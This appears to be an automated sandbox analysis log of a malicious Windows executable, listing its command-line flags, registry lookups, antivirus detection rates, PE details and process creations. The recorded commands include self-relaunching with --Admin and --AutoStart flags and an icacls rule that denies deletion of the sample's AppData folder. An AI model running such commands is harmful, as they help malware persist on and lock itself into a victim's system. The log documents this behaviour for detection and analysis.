                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: C:\Windows\0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: D:\Windows\0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: 7W0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: %username%0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: F:\0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --ForNetRes2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Task2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --AutoStart2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Service2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: X1W2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: x2X2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: x*W2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: C:\Windows\2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: D:\Windows\2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: 7W2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: %username%2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: F:\2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --ForNetRes2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Task2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --AutoStart2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Service2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: X1W2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: x2X2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: x*W2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: C:\Windows\2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: D:\Windows\2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: 7W2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: %username%2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: F:\2_2_00489F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --ForNetRes3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Task3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --AutoStart3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Service3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: C:\Windows\3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: D:\Windows\3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: %username%3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: F:\3_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --ForNetRes4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Task4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --AutoStart4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Service4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: C:\Windows\4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: D:\Windows\4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: %username%4_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: F:\4_2_00E39F90
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeReversingLabs: Detection: 86%
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeVirustotal: Detection: 76%
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeString found in binary or memory: set-addPolicy
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeString found in binary or memory: setct-CertReqTBEXsetct-CertResTBEsetct-CRLNotificationTBSsetct-CRLNotificationResTBSsetct-BCIDistributionTBSsetext-genCryptgeneric cryptogramsetext-miAuthmerchant initiated authsetext-pinSecuresetext-pinAnysetext-track2setext-cvadditional verificationset-policy-rootsetCext-hashedRootsetCext-certTypesetCext-merchDatasetCext-cCertRequiredsetCext-tunnelingsetCext-setExtsetCext-setQualfsetCext-PGWYcapabilitiessetCext-TokenIdentifiersetCext-Track2DatasetCext-TokenTypesetCext-IssuerCapabilitiessetAttr-CertsetAttr-PGWYcappayment gateway capabilitiessetAttr-TokenTypesetAttr-IssCapissuer capabilitiesset-rootKeyThumbset-addPolicysetAttr-Token-EMVsetAttr-Token-B0PrimesetAttr-IssCap-CVMsetAttr-IssCap-T2setAttr-IssCap-SigsetAttr-GenCryptgrmgenerate cryptogramsetAttr-T2Encencrypted track 2setAttr-T2cleartxtcleartext track 2setAttr-TokICCsigICC or token signaturesetAttr-SecDevSigsecure device signatureset-brand-IATA-ATAset-brand-Dinersset-brand-AmericanExpressset-brand-JCBset-brand-Visaset-brand-MasterCardset-brand-NovusDES-CDMFdes-cdmfrsaOAEPEncryptionSETITU-Titu-tJOINT-ISO-ITU-Tjoint-iso-itu-tinternational-organizationsInternational OrganizationsmsSmartcardLoginMicrosoft SmartcardloginmsUPNMicrosoft Universal Principal NameAES-128-CFB1aes-128-cfb1AES-192-CFB1aes-192-cfb1AES-256-CFB1aes-256-cfb1AES-128-CFB8aes-128-cfb8AES-192-CFB8aes-192-cfb8AES-256-CFB8aes-256-cfb8DES-CFB1des-cfb1DES-CFB8des-cfb8DES-EDE3-CFB1des-ede3-cfb1DES-EDE3-CFB8des-ede3-cfb8streetstreetAddresspostalCodeid-pplproxyCertInfoProxy Certificate Informationid-ppl-anyLanguageAny languageid-ppl-inheritAllInherit allnameConstraintsX509v3 Name Constraintsid-ppl-independentIndependentRSA-SHA256sha256WithRSAEncryptionRSA-SHA384sha384WithRSAEncryptionRSA-SHA512sha512WithRSAEncryptionRSA-SHA224sha224WithRSAEncryptionSHA256sha256SHA384sha384SHA512sha512SHA224sha224identified-organizationcerticom-arcwapwap-wsgid-characteristic-two-basisonBasistpBasisppBasisc2pnb163v1c2pnb163v2c2pnb163v3c2pnb176v1c2tnb191v1c2tnb191v2c2tnb191v3c2onb191v4c2onb191v5c2pnb208w1c2tnb239v1c2tnb239v2c2tnb239v3c2onb239v4c2onb239v5c2pnb272w1c2pnb304w1c2tnb359v1c2pnb368w1c2tnb431r1secp112r1secp112r2*
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeString found in binary or memory: id-cmc-addExtensions
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile read: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess created: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --Admin IsNotAutoStart IsNotTask
                Source: unknownProcess created: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe --Task
                Source: unknownProcess created: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
                Source: unknownProcess created: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess created: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic file information: File size 1150976 > 1048576
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\SystemAppData\mp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310717892.00000000041EB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316137935.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305033543.0000000004198000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\b source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2324171359.00000000046C2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.00000000044D3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Z source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2324171359.00000000046C2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004686000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\yewy\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\yt source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004686000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\H source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220728599.0000000003CC9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245981120.0000000003CE7000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\P source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
